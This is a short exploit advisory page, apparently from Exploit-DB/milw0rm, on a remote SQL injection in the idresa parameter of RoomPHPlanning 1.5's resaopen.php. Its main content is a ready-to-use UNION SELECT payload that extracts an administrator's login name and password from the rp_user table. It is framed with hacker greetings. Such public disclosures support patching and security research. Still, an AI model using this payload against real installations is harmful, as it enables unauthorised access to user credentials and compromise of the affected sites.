RoomPHPlanning 1.5 (idresa) Remote SQL Injection Vulnerability

EDB-ID: 5670	CVE: 2008-6633	OSVDB-ID: 45604
Author: His0k4	Published: 2008-05-24	Verified:
Exploit Code:	Vulnerable App: N/A

###########################################
{+} RoomPHPlanning v1.5 remote SQL injection exploit
{+} Script download :http://www.beaussier.com/roomphplanning/telecharge.php
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]
{+} Greetz : All friends & muslims HaCkeRs...
###########################################
{+} Exploit :
    http://localhost/[script_path]/resaopen.php?idresa={SQL}
{+} Example :
    http://localhost/[script_path]/resaopen.php?idresa=-1 UNION SELECT 1,2,3,4,5,6,concat(LoginUs,0x3a,PwdUs),8,9 FROM rp_user where IdUs=1--
############################################

# milw0rm.com [2008-05-24]

Comments

RoomPHPlanning 1.5 (idresa) Remote SQL Injection Vulnerability

Rating

No comments so far